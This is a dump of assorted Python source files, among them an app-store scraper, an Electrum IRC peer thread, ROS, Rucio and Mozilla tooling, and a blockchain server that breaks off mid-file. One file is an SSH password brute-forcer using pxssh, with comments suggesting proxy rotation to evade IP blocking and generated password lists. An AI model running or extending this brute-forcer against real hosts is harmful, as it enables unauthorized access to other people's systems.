source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
kuanShopApp_spider.py | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 25 04:26:09 2020
酷安应用商店应用数据爬取
@author: luohenyueji
"""
import requests
import queue
import threading
import re
from lxml import etree
import csv
from copy import deepcopy
class KuAn(object):
    """Scraper for app metadata (name + download link) from the CoolApk store.

    Producer/consumer pipeline over three queues:
      page_url_queue   -> get_detail_url_fun  -> detail_url_queue
      detail_url_queue -> get_download_url_fun -> save_queue
      save_queue       -> save_data_fun        -> <category>.csv
    """

    def __init__(self, category, page):
        # category: 'apk' (applications) or 'game'; page: number of listing pages
        if category not in ['apk', 'game']:
            raise ValueError('category参数不在范围内')
        # Listing category to scrape
        self.category = category
        self.page = page
        self.header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'}
        # Write the CSV header row (output file is truncated on every run)
        self.csv_header = ['应用名称', '下载链接']
        with open('{}.csv'.format(self.category), 'w', newline='', encoding='utf-8-sig') as f:
            csv_file = csv.writer(f)
            csv_file.writerow(self.csv_header)
        # Site root and category listing URL
        self.url = 'https://www.coolapk.com'
        self.base_url = 'https://www.coolapk.com/{}'.format(category)
        # Work queues:
        # listing pages still to crawl
        self.page_url_queue = queue.Queue()
        # per-app detail-page URLs
        self.detail_url_queue = queue.Queue()
        # scraped rows waiting to be written to CSV
        self.save_queue = queue.Queue()

    # ----- Collect the detail-page URL of every app on a listing page
    def get_detail_url_fun(self):
        while True:
            # Take one listing page off the queue (blocks while empty)
            page_url = self.page_url_queue.get()
            req = requests.get(url=page_url, headers=self.header)
            if req.status_code == 200:
                req.encoding = req.apparent_encoding
                html = etree.HTML(req.text)
                # The two categories use different listing markup
                if self.category == 'apk':
                    path = html.xpath('//*[@class="app_left_list"]/a/@href')
                elif self.category == 'game':
                    path = html.xpath('//*[@class="game_left_three"]/a/@href')
                for _ in path:
                    # Absolute URL of a single app's detail page
                    detail_url = self.url + _
                    print('正在获取详情链接:', detail_url)
                    self.detail_url_queue.put(deepcopy(detail_url))
            # Tell page_url_queue.join() that this item is done
            # see https://blog.csdn.net/qq_43577241/article/details/104442854
            self.page_url_queue.task_done()
            if self.page_url_queue.empty():
                break

    # ----- Fetch the download link from a single app's detail page
    def get_download_url_fun(self):
        while True:
            detail_url = self.detail_url_queue.get()
            req = requests.get(url=detail_url, headers=self.header)
            if req.status_code == 200:
                req.encoding = 'utf-8'
                # The download link is embedded in the page source; it may not
                # be directly downloadable.
                url_reg = "'(.*?)&from=from-web"
                name_reg = '<p class="detail_app_title">(.*?)<'
                # Download link (first regex hit; assumes the page always
                # contains one -- TODO confirm, IndexError otherwise)
                download_url = re.findall(url_reg, req.text)[0] + '&from=from-web'
                # Application name
                name = re.findall(name_reg, req.text)[0]
                data = {'name': name, 'url': download_url}
                print('获取到数据:', data)
                self.save_queue.put(data)
            self.detail_url_queue.task_done()

    # ----- Append scraped rows to the CSV file
    def save_data_fun(self):
        while True:
            data = self.save_queue.get()
            name = data.get('name')
            url = data.get('url')
            with open('{}.csv'.format(self.category), 'a+', newline='', encoding='utf-8-sig') as f:
                csv_file = csv.writer(f)
                csv_file.writerow([name, url])
            self.save_queue.task_done()

    def run(self):
        for _ in range(1, self.page + 1):
            # Listing page URL for page number _
            page_url = self.base_url + '?p={}'.format(_)
            print('下发页面url', page_url)
            # Enqueue the listing page for crawling
            self.page_url_queue.put(page_url)
        # NOTE(review): this drains page_url_queue synchronously in the main
        # thread before any worker starts, so the two get_detail_url threads
        # below are mostly idle -- confirm this call is intentional.
        self.get_detail_url_fun()
        thread_list = []
        # Two threads collecting detail-page URLs
        for _ in range(2):
            get_detail_url = threading.Thread(target=self.get_detail_url_fun)
            thread_list.append(get_detail_url)
        # Five threads fetching download links
        for _ in range(5):
            get_download_url = threading.Thread(target=self.get_download_url_fun)
            thread_list.append(get_download_url)
        # Two threads writing rows to the CSV
        for _ in range(2):
            save_data = threading.Thread(target=self.save_data_fun)
            thread_list.append(save_data)
        for t in thread_list:
            # Daemon threads: they end automatically when the main thread exits
            t.setDaemon(True)
            t.start()
        for q in [self.page_url_queue, self.detail_url_queue, self.save_queue]:
            # Block until every queued item has been marked done via task_done()
            # see https://blog.csdn.net/dashoumeixi/article/details/80946509
            q.join()
        print('爬取完成,结束')


if __name__ == '__main__':
    KuAn(category='game', page=2).run()
|
ircthread.py | #!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
    """Daemon thread that announces this Electrum server on IRC and tracks peers.

    Peers are discovered via the #electrum-lux channel: join/name events feed a
    WHO queue, and WHO replies are pushed to the processor's queue as
    ('join', ...) / ('quit', ...) events.  (Python 2 code: Queue module,
    str.encode('hex').)
    """

    def __init__(self, processor, config):
        threading.Thread.__init__(self)
        self.processor = processor
        self.daemon = True
        # All settings come from the [server] section of the config file.
        options = dict(config.items('server'))
        self.stratum_tcp_port = options.get('stratum_tcp_port')
        self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
        self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
        self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
        self.irc_bind_ip = options.get('irc_bind_ip')
        self.host = options.get('host')
        self.report_host = options.get('report_host')
        self.nick = options.get('irc_nick')
        self.irc_prefix = options.get('irc_prefix')
        # 'report_*' values override the local ones for public announcement
        # (useful behind NAT / port forwarding).
        if self.report_stratum_tcp_port:
            self.stratum_tcp_port = self.report_stratum_tcp_port
        if self.report_stratum_tcp_ssl_port:
            self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
        if self.report_host:
            self.host = self.report_host
        if not self.nick:
            # Derive a stable default nick from the host's hash (hex, 10 chars).
            self.nick = Hash(self.host)[:5].encode("hex")
        if not self.irc_prefix:
            self.irc_prefix = 'L_'
        self.pruning = True
        self.pruning_limit = config.get('leveldb', 'pruning_limit')
        # Final IRC nick: prefix marks peers of this network.
        self.nick = self.irc_prefix + self.nick
        self.password = None
        # (connection, nick) pairs pending a WHO query.
        self.who_queue = Queue.Queue()

    def getname(self):
        """Build the ircname string advertising version, pruning and ports."""
        s = 'v' + VERSION + ' '
        if self.pruning:
            s += 'p' + self.pruning_limit + ' '

        def add_port(letter, number):
            # Encode a port as e.g. 't' (default) or 't50011' (non-default);
            # empty string when the port is not offered.
            DEFAULT_PORTS = {'t':'50001', 's':'50002'}
            if not number: return ''
            if DEFAULT_PORTS[letter] == number:
                return letter + ' '
            else:
                return letter + number + ' '
        s += add_port('t',self.stratum_tcp_port)
        s += add_port('s',self.stratum_tcp_ssl_port)
        return s

    def start(self, queue):
        # queue: the processor's event queue receiving ('join'/'quit', ...).
        self.queue = queue
        threading.Thread.start(self)

    def on_connect(self, connection, event):
        connection.join("#electrum-lux")

    def on_join(self, connection, event):
        # A peer with our prefix joined: queue a WHO to learn its ports.
        m = re.match("("+self.irc_prefix+".*)!", event.source)
        if m:
            self.who_queue.put((connection, m.group(1)))

    def on_quit(self, connection, event):
        m = re.match("("+self.irc_prefix+"..*)!", event.source)
        if m:
            self.queue.put(('quit', [m.group(1)]))

    def on_kick(self, connection, event):
        m = re.match("("+self.irc_prefix+"..*)", event.arguments[0])
        if m:
            self.queue.put(('quit', [m.group(1)]))

    def on_disconnect(self, connection, event):
        # NOTE(review): raising BaseException aborts process_forever(); the
        # outer loop in run() catches it and reconnects.
        logger.error("irc: disconnected")
        raise BaseException("disconnected")

    def on_who(self, connection, event):
        # WHO reply: arguments[6] is "<hops> <ircname...>", i.e. host + ports.
        line = str(event.arguments[6]).split()
        try:
            ip = socket.gethostbyname(line[1])
        except:
            # no IPv4 address could be resolved. Could be .onion or IPv6.
            ip = line[1]
        nick = event.arguments[4]
        host = line[1]
        ports = line[2:]
        self.queue.put(('join', [nick, ip, host, ports]))

    def on_name(self, connection, event):
        # NAMES reply on channel join: WHO every peer carrying our prefix.
        for s in event.arguments[2].split():
            if s.startswith(self.irc_prefix):
                self.who_queue.put((connection, s))

    def who_thread(self):
        """Drain who_queue, rate-limited to one WHO per second."""
        while not self.processor.shared.stopped():
            try:
                connection, s = self.who_queue.get(timeout=1)
            except Queue.Empty:
                continue
            #logger.info("who: "+ s)
            connection.who(s)
            time.sleep(1)

    def run(self):
        # Wait until the server is ready before announcing ourselves.
        while self.processor.shared.paused():
            time.sleep(1)
        self.ircname = self.host + ' ' + self.getname()
        # avoid UnicodeDecodeError using LenientDecodingLineBuffer
        irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
        logger.info("joining IRC")
        t = threading.Thread(target=self.who_thread)
        t.start()
        # Reconnect loop: any failure sleeps 10s and retries with a fresh Reactor.
        while not self.processor.shared.stopped():
            client = irc.client.Reactor()
            try:
                #bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
                #ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
                #c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
                c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
            except irc.client.ServerConnectionError:
                logger.error('irc', exc_info=True)
                time.sleep(10)
                continue
            c.add_global_handler("welcome", self.on_connect)
            c.add_global_handler("join", self.on_join)
            c.add_global_handler("quit", self.on_quit)
            c.add_global_handler("kick", self.on_kick)
            c.add_global_handler("whoreply", self.on_who)
            c.add_global_handler("namreply", self.on_name)
            c.add_global_handler("disconnect", self.on_disconnect)
            c.set_keepalive(60)
            self.connection = c
            try:
                client.process_forever()
            except BaseException as e:
                # Includes the deliberate raise in on_disconnect().
                logger.error('irc', exc_info=True)
                time.sleep(10)
                continue
        logger.info("quitting IRC")
|
face-back.py | #!/usr/bin/env python
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
from duckietown_msgs.msg import Segment, SegmentList, Vector2D
from geometry_msgs.msg import Point
import numpy as np
import threading
#from PIL import Image as pimg
#import jpeg4py as jpeg
class FaceLulalaAlphaduck(object):
    """ROS node that decodes incoming camera frames off the ROS thread and runs
    line detection, publishing a SegmentList and an annotated image.

    BUG FIX applied: the verbose loginfo after image decompression was missing
    a closing parenthesis (SyntaxError in the original).
    """

    def __init__(self):
        self.node_name = "face_lulala_alphaduck_node"
        # Thread lock: at most one frame is processed at a time; frames
        # arriving while busy are dropped (see processImage).
        self.thread_lock = threading.Lock()
        # Bridge between ROS image messages and OpenCV arrays
        self.bridge = CvBridge()
        # Parameters
        self.image_size = rospy.get_param('~img_size')
        # Publishers
        # NOTE(review): Twist2DStamped is never imported in this file -- this
        # line raises NameError at startup; confirm the intended message type.
        self.pub_car_cmd = rospy.Publisher("~car_cmd", Twist2DStamped, queue_size=1)
        # Verbose option
        self.verbose = rospy.get_param('~verbose')
        if self.verbose:
            self.toc_pre = rospy.get_time()
        # Subscribers
        self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
        rospy.loginfo("[%s] Initialized." %(self.node_name))

    def cbImage(self,image_msg):
        """Image callback: hand the frame to a daemon thread and return."""
        thread = threading.Thread(target=self.processImage,args=(image_msg,))
        thread.setDaemon(True)
        thread.start()
        # Returns rightaway

    def processImage(self,image_msg):
        """Decode, detect line segments, and publish results for one frame.

        Drops the frame immediately if another frame is still being processed.
        """
        if not self.thread_lock.acquire(False):
            # Return immediately if the thread is locked
            return
        # Verbose
        if self.verbose:
            rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
        # Decode from compressed image with OpenCV.
        # NOTE(review): np.fromstring and cv2.CV_LOAD_IMAGE_COLOR are legacy
        # (OpenCV 2 / old NumPy) APIs -- kept as-is for compatibility.
        image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
        # Verbose
        if self.verbose:
            self.tic = rospy.get_time()
            # BUG FIX: added the missing closing parenthesis on this call.
            rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.))
        # Resize and crop image
        hei_original = image_cv.shape[0]
        wid_original = image_cv.shape[1]
        if self.image_size[0]!=hei_original or self.image_size[1]!=wid_original:
            image_cv = cv2.resize(image_cv, (self.image_size[1], self.image_size[0]), interpolation=cv2.INTER_NEAREST)
        # NOTE(review): self.top_cutoff is never set in __init__ -- confirm
        # where it is supposed to come from (AttributeError otherwise).
        image_cv = image_cv[self.top_cutoff:,:,:]
        # White balancing
        # NOTE(review): flag_wb / wb are also never initialized here.
        if self.flag_wb and self.flag_wb_ref:
            self.wb.correctImg(image_cv)
        # Set the image to be detected
        self.detector.setImage(image_cv)
        # Detect lines and normals for each lane-marking color
        lines_white, normals_white = self.detector.detectLines('white')
        lines_yellow, normals_yellow = self.detector.detectLines('yellow')
        lines_red, normals_red = self.detector.detectLines('red')
        # Draw lines and normals
        self.detector.drawLines(lines_white, (0,0,0))
        self.detector.drawLines(lines_yellow, (255,0,0))
        self.detector.drawLines(lines_red, (0,255,0))
        # SegmentList constructor
        segmentList = SegmentList()
        segmentList.header.stamp = image_msg.header.stamp
        # Convert to normalized pixel coordinates, and add segments to segmentList
        arr_cutoff = np.array((0, self.top_cutoff, 0, self.top_cutoff))
        arr_ratio = np.array((1./self.image_size[1], 1./self.image_size[0], 1./self.image_size[1], 1./self.image_size[0]))
        if len(lines_white)>0:
            lines_normalized_white = ((lines_white + arr_cutoff) * arr_ratio)
            segmentList.segments.extend(self.toSegmentMsg(lines_normalized_white, normals_white, Segment.WHITE))
        if len(lines_yellow)>0:
            lines_normalized_yellow = ((lines_yellow + arr_cutoff) * arr_ratio)
            segmentList.segments.extend(self.toSegmentMsg(lines_normalized_yellow, normals_yellow, Segment.YELLOW))
        if len(lines_red)>0:
            lines_normalized_red = ((lines_red + arr_cutoff) * arr_ratio)
            segmentList.segments.extend(self.toSegmentMsg(lines_normalized_red, normals_red, Segment.RED))
        # Verbose
        if self.verbose:
            self.toc = rospy.get_time()
            rospy.loginfo("[%s] Image processing time: %.3f ms" %(self.node_name, (self.toc-self.tic)*1000.0))
            rospy.loginfo("[%s] Number of white segments = %d" %(self.node_name, len(lines_white)))
            rospy.loginfo("[%s] number of yellow segments = %d" %(self.node_name, len(lines_yellow)))
            rospy.loginfo("[%s] number of red segments = %d" %(self.node_name, len(lines_red)))
            self.toc_pre = self.toc
        # Publish segmentList
        # NOTE(review): self.pub_lines / self.pub_image are never created in
        # __init__ -- confirm the missing Publisher declarations.
        self.pub_lines.publish(segmentList)
        # Publish the frame with lines
        image_msg_out = self.bridge.cv2_to_imgmsg(self.detector.getImage(), "bgr8")
        image_msg_out.header.stamp = image_msg.header.stamp
        self.pub_image.publish(image_msg_out)
        # Verbose
        if self.verbose:
            rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
        # Release the thread lock
        self.thread_lock.release()

    def onShutdown(self):
        rospy.loginfo("[LineDetectorNode] Shutdown.")

    def toSegmentMsg(self, lines, normals, color):
        """Convert (N,4) line endpoints + (N,2) normals into Segment messages."""
        segmentMsgList = []
        for x1,y1,x2,y2,norm_x,norm_y in np.hstack((lines,normals)):
            segment = Segment()
            segment.color = color
            segment.pixels_normalized[0].x = x1
            segment.pixels_normalized[0].y = y1
            segment.pixels_normalized[1].x = x2
            segment.pixels_normalized[1].y = y2
            segment.normal.x = norm_x
            segment.normal.y = norm_y
            segmentMsgList.append(segment)
        return segmentMsgList
if __name__ == '__main__':
    rospy.init_node('line_detector',anonymous=False)
    # BUG FIX: the original instantiated LineDetectorNode, which is not
    # defined in this file -- the node class here is FaceLulalaAlphaduck.
    line_detector_node = FaceLulalaAlphaduck()
    rospy.on_shutdown(line_detector_node.onShutdown)
    rospy.spin()
|
runner.py | import queue, threading
import datetime
class Stats:
    """Simple named counter/value store used for run statistics.

    BUG FIX: `d` was a mutable CLASS attribute, so every Stats instance
    shared one dict; it is now created per instance in __init__.
    """

    def __init__(self):
        # Per-instance storage for counters and values.
        self.d = {}

    def __repr__(self):
        return str(self.d)

    def __str__(self):
        # One tab-indented "key: value" line per entry.
        return '\n'.join(['\t{k}: {v}'.format(k=k, v=v) for k, v in self.d.items()])

    def add(self, key):
        """Increment counter `key`, initializing it to 1 if absent."""
        self.d[key] = self.d.get(key, 0) + 1

    def put(self, key, value):
        """Store an arbitrary value under `key` (overwrites)."""
        self.d[key] = value
class TaskRunner:
    """Abstract queue-based task runner: subclasses implement build_queue()
    to enqueue work and do_task() to process one item; run() drains the
    queue with consumer_threads worker threads and reports timing stats.

    BUG FIXES:
    - consumer() used `while not q.empty()` followed by a blocking get():
      with several consumers, another thread could drain the queue between
      the check and the get, blocking that consumer forever.  It now uses
      get_nowait() and exits cleanly on queue.Empty.
    - task_done() is now called in a finally block, so an exception inside
      do_task() no longer hangs q.join() forever.
    """

    def __init__(self, producer_threads=1, consumer_threads=2, q_delay=-1):
        self.producer_threads = producer_threads
        self.consumer_threads = consumer_threads
        self.q = queue.Queue()
        self.q_delay = q_delay
        self.stats = Stats()

    def build_queue(self):
        """Subclass hook: enqueue all tasks via add_task()."""
        raise NotImplementedError

    def do_task(self, task):
        """Subclass hook: process a single task."""
        raise NotImplementedError

    def add_task(self, task):
        self.q.put(task)

    def consumer(self):
        """Worker loop: process tasks until the queue is drained."""
        while True:
            try:
                task = self.q.get_nowait()
            except queue.Empty:
                # Queue drained: this worker is done.
                return
            try:
                self.do_task(task)
            finally:
                # Always mark the item done so q.join() can complete.
                self.q.task_done()

    def start_consumers(self):
        for i in range(self.consumer_threads):
            thread = threading.Thread(target=self.consumer)
            thread.start()

    def run(self):
        """Build the queue, drain it concurrently, and return the stats."""
        self.build_queue()
        print('Queue has {size} tasks'.format(size=self.q.qsize()))
        start = datetime.datetime.now()
        self.start_consumers()
        # Wait for every task to be marked done.
        self.q.join()
        end = datetime.datetime.now()
        duration = int(1000 * (end - start).total_seconds())
        self.stats.put('duration', '{ms}ms'.format(ms=duration))
        return self.stats
run.py | import cli_app.run_agent as agent
import cli_app.run_server as server
import threading
import time
def run():
    # Sequential variant: agent_run() only starts after server_run() returns.
    server.server_run()
    agent.agent_run()


def main():
    # Run server and agent concurrently and wait for both to finish.
    server_thread = threading.Thread(target=server.server_run)
    server_thread.start()
    agent_thread = threading.Thread(target=agent.agent_run)
    agent_thread.start()
    server_thread.join()
    agent_thread.join()


if __name__ == '__main__':
    main()
    # run()
    # NOTE(review): both threads are already joined inside main(); confirm
    # what this trailing 50-second sleep is for.
    time.sleep(50)
|
rse.py | # -*- coding: utf-8 -*-
# Copyright European Organization for Nuclear Research (CERN) since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Abacus-RSE is a daemon to update RSE counters.
"""
import logging
import os
import socket
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.logging import setup_logging, formatted_logger
from rucio.common.utils import get_thread_with_periodic_running_function, daemon_sleep
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rse_counter import get_updated_rse_counters, update_rse_counter, fill_rse_counter_history_table
graceful_stop = threading.Event()
def rse_update(once=False, sleep_time=10):
    """
    Main loop to check and update the RSE Counters.

    :param once: run a single iteration and exit instead of looping.
    :param sleep_time: seconds to sleep when no work was found.
    """
    # Make an initial heartbeat so that all abacus-rse daemons have the correct worker number on the next try
    executable = 'abacus-rse'
    hostname = socket.gethostname()
    pid = os.getpid()
    current_thread = threading.current_thread()
    live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
    while not graceful_stop.is_set():
        try:
            # Heartbeat: also yields this worker's index and the total count,
            # used to partition the RSEs across daemons.
            heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
            prepend_str = 'rse_update[%i/%i] : ' % (heartbeat['assign_thread'], heartbeat['nr_threads'])
            logger = formatted_logger(logging.log, prepend_str + '%s')
            # Select a bunch of rses for to update for this worker
            start = time.time()  # NOQA
            rse_ids = get_updated_rse_counters(total_workers=heartbeat['nr_threads'],
                                              worker_number=heartbeat['assign_thread'])
            logger(logging.DEBUG, 'Index query time %f size=%d' % (time.time() - start, len(rse_ids)))
            # If the list is empty, sent the worker to sleep
            if not rse_ids and not once:
                logger(logging.INFO, 'did not get any work')
                daemon_sleep(start_time=start, sleep_time=sleep_time, graceful_stop=graceful_stop)
            else:
                for rse_id in rse_ids:
                    # Stop promptly if a shutdown was requested mid-batch.
                    if graceful_stop.is_set():
                        break
                    start_time = time.time()
                    update_rse_counter(rse_id=rse_id)
                    logger(logging.DEBUG, 'update of rse "%s" took %f' % (rse_id, time.time() - start_time))
        except Exception:
            # NOTE(review): if live() raises on the very first iteration,
            # `logger` is still unbound here (UnboundLocalError) -- confirm.
            logger(logging.ERROR, traceback.format_exc())
        if once:
            break
    logging.info('rse_update: graceful stop requested')
    die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
    logging.info('rse_update: graceful stop done')
def stop(signum=None, frame=None):
    """
    Graceful exit.

    Signal-handler signature (signum, frame); simply flags every loop that
    watches graceful_stop to finish its current work and exit.
    """
    graceful_stop.set()
def run(once=False, threads=1, fill_history_table=False, sleep_time=10):
    """
    Starts up the Abacus-RSE threads.

    :param once: execute a single rse_update iteration and return.
    :param threads: number of rse_update worker threads to start.
    :param fill_history_table: also start a periodic (hourly) thread that
        snapshots counters into the history table.
    :param sleep_time: idle sleep passed through to rse_update.
    """
    setup_logging()
    if rucio.db.sqla.util.is_old_db():
        raise exception.DatabaseException('Database was not updated, daemon won\'t start')
    executable = 'abacus-rse'
    hostname = socket.gethostname()
    # Clean up stale heartbeats for this executable/host before starting.
    sanity_check(executable=executable, hostname=hostname)
    if once:
        logging.info('main: executing one iteration only')
        rse_update(once)
    else:
        logging.info('main: starting threads')
        # `threads` is rebound from an int to the list of Thread objects.
        threads = [threading.Thread(target=rse_update, kwargs={'once': once, 'sleep_time': sleep_time}) for i in
                   range(0, threads)]
        if fill_history_table:
            threads.append(get_thread_with_periodic_running_function(3600, fill_rse_counter_history_table, graceful_stop))
        [t.start() for t in threads]
        logging.info('main: waiting for interrupts')
        # Interruptible joins require a timeout.
        while threads[0].is_alive():
            [t.join(timeout=3.14) for t in threads]
|
profileserver.py | #literal #!/usr/bin/python
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import SimpleHTTPServer
import SocketServer
import socket
import threading
import os
import sys
import shutil
from datetime import datetime
SCRIPT_DIR = os.path.abspath(os.path.realpath(os.path.dirname(sys.argv[0])))
sys.path.insert(0, SCRIPT_DIR)
from automation import Automation
from automationutils import getDebuggerInfo, addCommonOptions
PORT = 8888
PROFILE_DIRECTORY = os.path.abspath(os.path.join(SCRIPT_DIR, "./pgoprofile"))
MOZ_JAR_LOG_DIR = os.path.abspath(os.getenv("JARLOG_DIR"))
os.chdir(SCRIPT_DIR)
class EasyServer(SocketServer.TCPServer):
    # Allow quick restarts: rebind the port even if it is still in TIME_WAIT.
    allow_reuse_address = True
if __name__ == '__main__':
    from optparse import OptionParser
    automation = Automation()
    parser = OptionParser()
    addCommonOptions(parser)
    options, args = parser.parse_args()
    debuggerInfo = getDebuggerInfo(".", options.debugger, options.debuggerArgs,
                                   options.debuggerInteractive)
    # Serve the current directory (the PGO profiling pages) on PORT in a
    # background thread while the browser runs against it.
    httpd = EasyServer(("", PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
    t = threading.Thread(target=httpd.serve_forever)
    t.setDaemon(True) # don't hang on exit
    t.start()
    automation.setServerInfo("localhost", PORT)
    automation.initializeProfile(PROFILE_DIRECTORY)
    browserEnv = automation.environment()
    browserEnv["XPCOM_DEBUG_BREAK"] = "warn"
    # Direct JAR access logging into the directory given by $JARLOG_DIR.
    browserEnv["MOZ_JAR_LOG_DIR"] = MOZ_JAR_LOG_DIR
    url = "http://localhost:%d/index.html" % PORT
    appPath = os.path.join(SCRIPT_DIR, automation.DEFAULT_APP)
    # Run the browser against the profiling page; exit code is propagated.
    status = automation.runApp(url, browserEnv, appPath, PROFILE_DIRECTORY, {},
                               debuggerInfo=debuggerInfo,
                               # the profiling HTML doesn't output anything,
                               # so let's just run this without a timeout
                               timeout = None)
    sys.exit(status)
|
2.051sshBrute.py | from pexpect import pxssh
from threading import *
import optparse
import time
'''
This code we need learning pxssh from pexpect
Docstring:
----------
1. first,we create maxConnection to set max number of threads. This example we set 5
2. we set global variable Found and Fails
Found: check any thread finds the correct password, if found, Found = True else false
Fails: Number of failed in "timeout Error"
3. we try connect with target ssh use password list,if find error between "read_nonblocking" and
"synchronize with original prompt" then, we need set time.sleep(1) and try again !
Note:
-----
1. we threading code write for loop, that means:
when we have many many password,
If the previous thread finds it,
then the following thread does not need to look up.
2.if thread have so many Fails(this example is 5),then exit and
we need check target computer or yourself computer.
'''
maxConnection = 5
connection_lock = BoundedSemaphore(value=maxConnection)
Found = False
Fails = 0
def connect(host, user, password):
    '''
    Attempt one SSH login; retry on known transient pxssh errors.

    :param host: target host
    :param user: target user
    :param password: candidate password to try
    :return: None (sets the module-level Found flag on success)
    '''
    global Found, Fails
    try:
        s = pxssh.pxssh()  # create an instance
        s.login(host, user, password)  # login
        print '[+] Password Found: ' + password
        Found = True
    except Exception as e:
        # pxssh raises these two when the session desynchronizes; back off
        # one second and retry the same credentials (recursively).
        if 'read_nonblocking' in str(e):
            print '[!] found read_nonblocking will be restart '
            # Counted toward the global failure budget checked in main().
            Fails += 1
            time.sleep(1)
            connect(host, user, password)
        elif 'synchronize with original prompt' in str(e):
            print '[!] found synchronize will be restart '
            time.sleep(1)
            connect(host, user, password)
def main():
    '''
    Parse CLI options and launch one login-attempt thread per password.
    '''
    parser = optparse.OptionParser('usage%prog ' +
                                   '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
    parser.add_option('-u', dest='user', type='string', help='specify target user')
    parser.add_option('-F', dest='passwordList', type='string', help='specify password list')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwordList = options.passwordList
    user = options.user
    if (host is None) or (passwordList is None) or (user is None):
        print parser.usage
        exit(0)
    # -F takes a comma-separated list of candidate passwords.
    passwordList = passwordList.split(',')
    for password in passwordList:
        # Stop spawning threads as soon as any earlier thread succeeded.
        if Found:
            print '[*] Exiting: Password Found'
            exit(0)
        # Too many timeout-style failures: give up (see module docstring).
        if Fails > 5:
            print '[!] Exiting: Too many socket timeout'
            exit(0)
        t = Thread(target=connect, args=(host, user, password))
        t.start()
        print '[-] Testing password {} with {}'.format(password, t.getName())


if __name__ == '__main__':
    main()
'''
HomeWork:
0. read this code,
1. add "change ip proxy function" if ip was blocked. means add "ip error" in except
2. alter password to passFile,means read password from file.you can use following code:
["".join(x) for x in itertools.product("0123456789", repeat=6)])
friendly reminder:
you need use generator in Python, else your computer will be die! :)
Good Luck ~
'''
|
blockchain.py | #!/usr/bin/python3.6
from miner import Miner
import ast
from multiprocessing import Process, Manager
import socket
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 65432 # Port to listen on (non-privileged ports are > 1023)
DIFFICULTY = 1 # Number of zeroes at the beginning of a new hash
GENESIS_BLOCK = {
"hash": "0",
"car": {
"id": "GENESIS BLOCK"
}
}
def main():
    """Run the blockchain 'network': seed the chain with the genesis block,
    then serve a TCP loop that accepts either queries or new blocks."""
    # initialize blockchain by adding the genesis block
    # and create a file where all blocks will be appended
    blockchain = [
        GENESIS_BLOCK
    ]
    print_blockchain(blockchain)
    # create a server which simulates all blockchain miners
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((HOST, PORT))
        s.listen()
        while True:
            conn, addr = s.accept()
            with conn:
                print('Connected by', addr)
                data = conn.recv(2048)
                print("A new block received: ", data.decode())
                # in python3 the string must be encoded
                conn.sendall("hello from server side".encode())
                # Messages are Python-literal dicts sent as text.
                msg = ast.literal_eval(data.decode())
                try:
